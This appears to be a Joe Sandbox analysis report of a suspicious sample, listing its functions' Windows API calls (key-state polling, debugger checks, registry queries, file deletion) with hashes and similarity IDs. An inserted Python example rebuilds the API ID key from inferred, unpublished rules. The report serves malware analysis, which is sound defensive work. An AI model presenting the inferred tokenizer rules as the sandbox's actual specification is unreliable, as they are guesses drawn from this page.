                                                • Opcode Fuzzy Hash: fd76b837149b404883c51a71927240d395863e152ce070256aa88410c8dbf3d6
                                                • Instruction Fuzzy Hash: 6D016D31145621B6E3310A66CD0EF977F98AF027B4F11C210BA9D6A1E08BB45854DB90
                                                APIs
                                                • IsThemeActive.UXTHEME ref: 003732C4
                                                  • Part of subcall function 0037326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00373282
                                                  • Part of subcall function 0037326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00373299
                                                  • Part of subcall function 00373312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,003732EF,?), ref: 00373342
                                                  • Part of subcall function 00373312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003732EF,?), ref: 00373355
                                                  • Part of subcall function 00373312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00442418,00442400,?,?,?,?,?,?,003732EF,?), ref: 003733C1
                                                  • Part of subcall function 00373312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00442418,?,?,?,?,?,?,?,003732EF,?), ref: 00373442
                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 003732FE
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                • String ID:
                                                • API String ID: 1550534281-0
                                                • Opcode ID: 031901594b822cc498f6d7ecf0b51bc543597b895630bde221723d8bd7cd8a11
                                                • Instruction ID: b88fa5fc428695b839b901bab4a219d75ef9af7c41f544efdc8d9eca141f6da8
                                                • Opcode Fuzzy Hash: 031901594b822cc498f6d7ecf0b51bc543597b895630bde221723d8bd7cd8a11
                                                • Instruction Fuzzy Hash: F0F0E93A544344AFE7126F70FE0AB643BF0AB01705F908825F90C894E3CBFD84909B08
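                                                The API ID printed in each record is the similarity key Joe Sandbox uses to match functions across reports. Reading the records on this page against their API lists, it is built from the listed call names: the Get/Set verbs and fragments shorter than three characters (Is, To, Ex, the W suffix) are dropped, the remaining CamelCase fragments are counted across every listed call (subcall lines included), grouped by count with the most frequent group first, sorted within each group and the groups joined with "$". The Python below is an added example, not part of this report and not Joe Sandbox's own code: it rebuilds that key from a record's APIs section, using the record immediately above as constructed sample input. The stop-token and minimum-length rules are inferred from this page and are assumptions, not a published specification of the sandbox's tokenizer.

```python
import re
from collections import Counter

# Assumption (inferred from the records on this page, not a published
# Joe Sandbox specification): the verb prefixes Get/Set and any fragment
# shorter than three characters (Is, To, Ex, the W suffix) never reach
# an API ID, so they are dropped here.
STOP_TOKENS = {"Get", "Set"}
MIN_TOKEN_LEN = 3

# One call line from a record's "APIs" section, e.g.
#   "• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0038FD53"
#   "  • Part of subcall function 00375F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00376049"
# search() skips the bullet and the "Part of subcall function NNNNNNNN:" prefix
# because neither contains "<name>.<UPPERCASE MODULE>".
CALL_RE = re.compile(r"([A-Za-z_][A-Za-z0-9_]*)\.([A-Z][A-Z0-9]*)")


def tokenize(api_name):
    """Split an API name at every uppercase letter and drop the noise.
    'Shell_NotifyIconW'    -> ['Shell_', 'Notify', 'Icon']
    '__Init_thread_footer' -> ['Init_thread_footer']   (bare '__' is dropped)
    '__dosmaperr'          -> ['__dosmaperr']          (no uppercase: kept whole)
    """
    tokens = []
    for part in re.split(r"(?=[A-Z])", api_name):
        if not any(c.isalnum() for c in part):
            continue
        if len(part) < MIN_TOKEN_LEN or part in STOP_TOKENS:
            continue
        tokens.append(part)
    return tokens


def api_id(call_names):
    """Build the similarity key from the API names of one function record.

    Every listed call counts, subcall lines included, so Shell_NotifyIconW
    seen once directly and once through a subcall counts twice. Tokens are
    grouped by that count, most frequent group first, sorted within the
    group, and the groups are joined with '$'.
    """
    counts = Counter(tok for name in call_names for tok in tokenize(name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n]))
                    for n in sorted(by_count, reverse=True))


def calls_from_record(record_text):
    """Return the API names listed between 'APIs' and the next section header
    ('Strings' or 'Memory Dump Source') of one function record. Only that
    section is scanned, so a snapshot file name such as
    'hcaresult_7_2_370000_qwlvpmrupf.jbxd' is never mistaken for a call."""
    names = []
    in_apis = False
    for line in record_text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            in_apis = True
            continue
        if stripped in ("Strings", "Memory Dump Source"):
            in_apis = False
            continue
        if in_apis:
            match = CALL_RE.search(stripped)
            if match:
                names.append(match.group(1))
    return names


# Constructed sample input: the APIs section of the record above (process 7,
# image base 0x370000), copied from the report; the variable is ours.
SAMPLE_RECORD = """\
APIs
• IsThemeActive.UXTHEME ref: 003732C4
  • Part of subcall function 0037326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00373282
  • Part of subcall function 0037326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00373299
  • Part of subcall function 00373312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,003732EF,?), ref: 00373342
  • Part of subcall function 00373312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003732EF,?), ref: 00373355
  • Part of subcall function 00373312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00442418,00442400,?,?,?,?,?,?,003732EF,?), ref: 003733C1
  • Part of subcall function 00373312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00442418,?,?,?,?,?,?,?,003732EF,?), ref: 00373442
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 003732FE
Memory Dump Source
• Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
"""

# The API ID the report prints for that record.
PAGE_API_ID = "InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme"

if __name__ == "__main__":
    calls = calls_from_record(SAMPLE_RECORD)
    key = api_id(calls)
    print(len(calls), "calls ->", key)
    print("matches the report:", key == PAGE_API_ID)
```

                                                Because the key ignores call order, argument values and the Get/Set verb, two functions with the same API ID are only candidates for being the same code; confirm a match with the Opcode ID or Instruction Fuzzy Hash before treating them as identical.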
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: SleepTimetime
                                                • String ID:
                                                • API String ID: 346578373-0
                                                • Opcode ID: bce833eccc7e22b638cd26f40bd0e8e85901f5b9a13f92d54e07f677654024f5
                                                • Instruction ID: 95c8c31d42d912a5d33d6772707ef4568db0d9a1538dc063e12e4aebd691fb0b
                                                • Opcode Fuzzy Hash: bce833eccc7e22b638cd26f40bd0e8e85901f5b9a13f92d54e07f677654024f5
                                                • Instruction Fuzzy Hash: 6AF08C722406059FC360EBA9D509F5AB7E9FF49360F00846EE85ECB260DB70A800CB95
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0037AE65,?,?,?), ref: 00378793
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0037AE65,?,?,?), ref: 003787C9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide
                                                APIs
                                                • CharLowerBuffW.USER32(?,?), ref: 003DFBE3
                                                Similarity
                                                • API ID: BuffCharLower
                                                Similarity
                                                • API ID: ResumeThread
                                                APIs
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 003E8EBE
                                                Similarity
                                                • API ID: FullNamePathPrivateProfileString
                                                APIs
                                                  • Part of subcall function 00376332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0037637F,?,?,003760AA,?,00000001,?,?,00000000), ref: 0037633E
                                                  • Part of subcall function 00376332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00376350
                                                  • Part of subcall function 00376332: FreeLibrary.KERNEL32(00000000,?,?,0037637F,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376362
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003760AA,?,00000001,?,?,00000000), ref: 0037639F
                                                  • Part of subcall function 003762FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003B54C3,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376304
                                                  • Part of subcall function 003762FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00376316
                                                  • Part of subcall function 003762FB: FreeLibrary.KERNEL32(00000000,?,?,003B54C3,?,?,003760AA,?,00000001,?,?,00000000), ref: 00376329
                                                Similarity
                                                • API ID: Library$Load$AddressFreeProc
                                                Similarity
                                                • API ID: __wsopen_s
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00376B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0037B0AC
                                                Similarity
                                                • API ID: FileRead
                                                APIs
                                                  • Part of subcall function 003A500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,003A31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 003A504E
                                                • _free.LIBCMT ref: 003A53FC
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,003A31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 003A504E
                                                Similarity
                                                • API ID: AllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00396A99,?,0000015D,?,?,?,?,003985D0,000000FF,00000000,?,?), ref: 003A3BE2
                                                Similarity
                                                • API ID: AllocateHeap
                                                Similarity
                                                • API ID: ClearVariant
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID:
                                                • API String ID: 2638373210-0
                                                • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                • Instruction ID: 6e311fba07fd90d74a97164dfb1bbc5c2a01ac93763769d80b1f96378e521fa6
                                                • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                • Instruction Fuzzy Hash: B4F0F87140420DFFDF05DF90C941E9E7B79FB05318F208445F9199A151D336DA21EBA1
                                                APIs
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID:
                                                • API String ID: 176396367-0
                                                • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                • Instruction ID: d21fe0207187ce21b9e2fa5d7e4f36555491b854051dfbb1916921af3e3ed398
                                                • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                • Instruction Fuzzy Hash: E7D052223420203AAA6A213D2D0BC7F891CCBC2AA0B04007EFA02CE1AAE8444C0302A0
                                                APIs
                                                • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 003DE7A2
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                Similarity
                                                • API ID: NamePathShort_wcslen
                                                • String ID:
                                                • API String ID: 2021730007-0
                                                • Opcode ID: 6259a55f3898d6b62a047f1b6243f50a01de8980e7eed63e972c69fa021a2b93
                                                • Instruction ID: cbb1e62147bc18e233c850b68d95edf71e03afc04560d00b9bcc92106bec18df
                                                • Opcode Fuzzy Hash: 6259a55f3898d6b62a047f1b6243f50a01de8980e7eed63e972c69fa021a2b93
                                                • Instruction Fuzzy Hash: 2EE0CD7694022457C721939C9C05FDA77DDEFC8790F0441B4FD09DB248DDA4DD808590
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,0037B0DE,?,?,00000000,?,00376B73,?), ref: 0038F156
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: af8e5367288cdf3a5d45755d01c5b6087470c88dd2f787e6b3bef861912416fd
                                                • Instruction ID: 0d2864a6156a287aa42c1d926c2dc5f5831262e7bf6e20517427bb445d511816
                                                • Opcode Fuzzy Hash: af8e5367288cdf3a5d45755d01c5b6087470c88dd2f787e6b3bef861912416fd
                                                • Instruction Fuzzy Hash: 64E092B5910704AFD728DF55D846D97BBF8EB08310B00456EA85697740E7B1BD448B50
                                                APIs
                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003739FD
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                Similarity
                                                • API ID: LongNamePath_wcslen
                                                • String ID:
                                                • API String ID: 541455249-0
                                                • Opcode ID: 386af84144545272eaedd580f0801a7e28bfadbbb598bfbf525722651247f41e
                                                • Instruction ID: 05d961022679e4f420a36ac327e7eb71425054e4b2f89e99d62ceb2540273e4a
                                                • Opcode Fuzzy Hash: 386af84144545272eaedd580f0801a7e28bfadbbb598bfbf525722651247f41e
                                                • Instruction Fuzzy Hash: 36E0CD7290012457C721939C9C05FDA77DDDFC8790F0441B5FD09DB248DDB4DD808590
                                                APIs
                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 003DE76C
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                Similarity
                                                • API ID: FolderPath_wcslen
                                                • String ID:
                                                • API String ID: 2987691875-0
                                                • Opcode ID: da3885f3d38a7f82a058b0bd368753bda5a5a9b9685c01d9d0406417fb3a23ef
                                                • Instruction ID: 0997f7fcc97a1c910bc591568df1578d81f0920d8d7669f86698ce17239c537e
                                                • Opcode Fuzzy Hash: da3885f3d38a7f82a058b0bd368753bda5a5a9b9685c01d9d0406417fb3a23ef
                                                • Instruction Fuzzy Hash: 8BD05EA19002282BDF60A7B99D0DDB73AACD740210F0046A0786DD3142E974ED448AA0
                                                APIs
                                                • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,003DD9DC,?,?), ref: 003DDA72
                                                Similarity
                                                • API ID: CopyFile
                                                • String ID:
                                                • API String ID: 1304948518-0
                                                • Opcode ID: 0c47462d0ddf0bac4e88db843d25a4570da5d145de6f8d2762d3360bda05a3d2
                                                • Instruction ID: 35ecfcf648b3e7f9fe7abf7599698a11afc3539cdc03a5e549165e7871559a98
                                                • Opcode Fuzzy Hash: 0c47462d0ddf0bac4e88db843d25a4570da5d145de6f8d2762d3360bda05a3d2
                                                • Instruction Fuzzy Hash: 0BD0A7305D0208BBEF108B90CD03F99B76CE711B45F1041A4B101EA0D0C7B5A5089724
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,00000000,?,003B0AA4,?,?,00000000,?,003B0AA4,00000000,0000000C), ref: 003B0757
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 4a13e5e3d3dd7bf8307b490ddc6f17afebb2688e115b22d9ac43136f8e1ccce8
                                                • Instruction ID: 900b6aac81381dc0e936a85b83aae7149060a4c0d65918a5c153e984ab77cd24
                                                • Opcode Fuzzy Hash: 4a13e5e3d3dd7bf8307b490ddc6f17afebb2688e115b22d9ac43136f8e1ccce8
                                                • Instruction Fuzzy Hash: D6D06C3200010DBBDF028F84DD06EDA3BAAFB48714F014010BE1866020C732E821AB94
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,003DD755), ref: 003DE9C6
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 272a5494cee8beb07b8ef7c2b87cafbff3f10931ed11ae079ce0c54cda6aff46
                                                • Instruction ID: e77444e7d7fa8e497d19cebb0e8c03ec8ec91793587e34a54a90b3bd26cbefba
                                                • Opcode Fuzzy Hash: 272a5494cee8beb07b8ef7c2b87cafbff3f10931ed11ae079ce0c54cda6aff46
                                                • Instruction Fuzzy Hash: EFB0922500261005BD792AB82A281A92B0068433A67DD1BEAE4B9A92E3C33D880BE610
                                                APIs
                                                  • Part of subcall function 003DDB69: FindFirstFileW.KERNELBASE(?,?), ref: 003DDBE0
                                                  • Part of subcall function 003DDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 003DDC30
                                                  • Part of subcall function 003DDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 003DDC41
                                                  • Part of subcall function 003DDB69: FindClose.KERNEL32(00000000), ref: 003DDC58
                                                • GetLastError.KERNEL32 ref: 003E6583
                                                Similarity
                                                • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                • String ID:
                                                • API String ID: 2191629493-0
                                                • Opcode ID: b76c38f0073fc0fb3ed153dd5c7a8a056d724a082f0e7b5b7f365ba519470ca8
                                                • Instruction ID: 241a01ddb55ea56c5c2a62a3b91d1a88876c8ea9411ab6be74197db24fce5d10
                                                • Opcode Fuzzy Hash: b76c38f0073fc0fb3ed153dd5c7a8a056d724a082f0e7b5b7f365ba519470ca8
                                                • Instruction Fuzzy Hash: 2DF08C323002108FCB21EF59D845B6AB7E5AF58360F058059F90A9B3A2CB74BC018B94
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,00000000,003B3A1C), ref: 00377973
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 68594d60a07a7649114ab02569ed261ff36b83991d54c10f2e1409769d15d8a1
                                                • Instruction ID: 7107d53eef1456d63ca5262590c7c1c30bc8e400d7e8bd0a3aa243aa5ff5cf03
                                                • Opcode Fuzzy Hash: 68594d60a07a7649114ab02569ed261ff36b83991d54c10f2e1409769d15d8a1
                                                • Instruction Fuzzy Hash: A4E0B675805B12CFC3324F1AE904412FBF8FFD23A13218A2ED5E9926A0D3B4589ACB50
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003EA11B
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 003EA176
                                                • FindClose.KERNEL32(00000000), ref: 003EA181
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 003EA19D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003EA1ED
                                                • SetCurrentDirectoryW.KERNEL32(00437B94), ref: 003EA20B
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003EA215
                                                • FindClose.KERNEL32(00000000), ref: 003EA222
                                                • FindClose.KERNEL32(00000000), ref: 003EA232
                                                  • Part of subcall function 003DE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003DE2C9
                                                Strings
                                                Similarity
                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 2640511053-438819550
                                                • Opcode ID: f06f8451b4f89ab1abf233e273f338089ff78a43c5eea8a67f9782fab4b5050c
                                                • Instruction ID: aa7f81db468c1efff3aa8268e74aab170f557ba2574010f0106737b1e30a4586
                                                • Opcode Fuzzy Hash: f06f8451b4f89ab1abf233e273f338089ff78a43c5eea8a67f9782fab4b5050c
                                                • Instruction Fuzzy Hash: AD315931500A6D6BCF12AFA1DC48ADE77AC9F05320F1102A6E911F30D2DB35EE88CB65
                                                APIs
                                                  • Part of subcall function 003FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003FC00D,?,?), ref: 003FD314
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD350
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3C7
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3FD
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003FC89D
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 003FC908
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003FC92C
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003FC98B
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003FCA46
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 003FCAB3
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 003FCB48
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 003FCB99
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 003FCC42
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003FCCE1
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003FCCEE
                                                Similarity
                                                • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                • String ID:
                                                • API String ID: 3102970594-0
                                                • Opcode ID: ef9c76554dc434fa72b045c75e803a774eb2686da387e91dffed1e76f43cd698
                                                • Instruction ID: e16711da4f1807c57855f8ba1ebb4c01b1911022c1088c99dc255ae0aaa512e1
                                                • Opcode Fuzzy Hash: ef9c76554dc434fa72b045c75e803a774eb2686da387e91dffed1e76f43cd698
                                                • Instruction Fuzzy Hash: 3B025B716142089FD715CF24C995E3ABBE5EF48308F09849DE94ACF2A2DB31ED46CB91
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 003DA572
                                                • GetAsyncKeyState.USER32(000000A0), ref: 003DA5F3
                                                • GetKeyState.USER32(000000A0), ref: 003DA60E
                                                • GetAsyncKeyState.USER32(000000A1), ref: 003DA628
                                                • GetKeyState.USER32(000000A1), ref: 003DA63D
                                                • GetAsyncKeyState.USER32(00000011), ref: 003DA655
                                                • GetKeyState.USER32(00000011), ref: 003DA667
                                                • GetAsyncKeyState.USER32(00000012), ref: 003DA67F
                                                • GetKeyState.USER32(00000012), ref: 003DA691
                                                • GetAsyncKeyState.USER32(0000005B), ref: 003DA6A9
                                                • GetKeyState.USER32(0000005B), ref: 003DA6BB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 6754962e5bfc7a9d31a994ee6144d81eacd5302f7255fc07e6d908a0b2c220a3
                                                • Instruction ID: 07839f8015722c23bca46071d9b7dc9904724598a202ee665fd41f09949cb8ec
                                                • Opcode Fuzzy Hash: 6754962e5bfc7a9d31a994ee6144d81eacd5302f7255fc07e6d908a0b2c220a3
                                                • Instruction Fuzzy Hash: 6B41D872908FC9ADFF334B60AA043A5BEA16B12344F09405BD5C65A7C1DBA4DDC8C757
                                                APIs
                                                • CoInitialize.OLE32 ref: 003F40D1
                                                • CoUninitialize.OLE32 ref: 003F40DC
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00410B44,?), ref: 003F4136
                                                • IIDFromString.OLE32(?,?), ref: 003F41A9
                                                • VariantInit.OLEAUT32(?), ref: 003F4241
                                                • VariantClear.OLEAUT32(?), ref: 003F4293
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 636576611-1287834457
                                                • Opcode ID: be2febf5c523f21f0cbd44a4e0204510d126827bc3f9409b6792f63c33a11e46
                                                • Instruction ID: 5ba1def5333ab994c92a798d969cd5b01a61a54d10e5a7d599c1720da722897b
                                                • Opcode Fuzzy Hash: be2febf5c523f21f0cbd44a4e0204510d126827bc3f9409b6792f63c33a11e46
                                                • Instruction Fuzzy Hash: AC61D171204305AFC312DF64D888F6BBBE8AF49714F10485DF6859B2A1D770ED88CB92
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 003EA4D5
                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003EA5E8
                                                  • Part of subcall function 003E41CE: GetInputState.USER32 ref: 003E4225
                                                  • Part of subcall function 003E41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003E42C0
                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003EA505
                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003EA5D2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                • String ID: *.*
                                                • API String ID: 1972594611-438819550
                                                • Opcode ID: 7d62ad1c689d3552c0684a738aa1016047f008281ee52ebcd21bd245f47ed04b
                                                • Instruction ID: a210c28237ac8fb858d5a39b9e5e16feec600b6325e52366de15b5e02835411a
                                                • Opcode Fuzzy Hash: 7d62ad1c689d3552c0684a738aa1016047f008281ee52ebcd21bd245f47ed04b
                                                • Instruction Fuzzy Hash: 3241B07190065AAFCF22DFA5CC49BEEBBB4EF06310F208156E445A61D1D734AE88CF61
                                                APIs
                                                • DefDlgProcW.USER32(?,?), ref: 003722EE
                                                • GetSysColor.USER32(0000000F), ref: 003723C3
                                                • SetBkColor.GDI32(?,00000000), ref: 003723D6
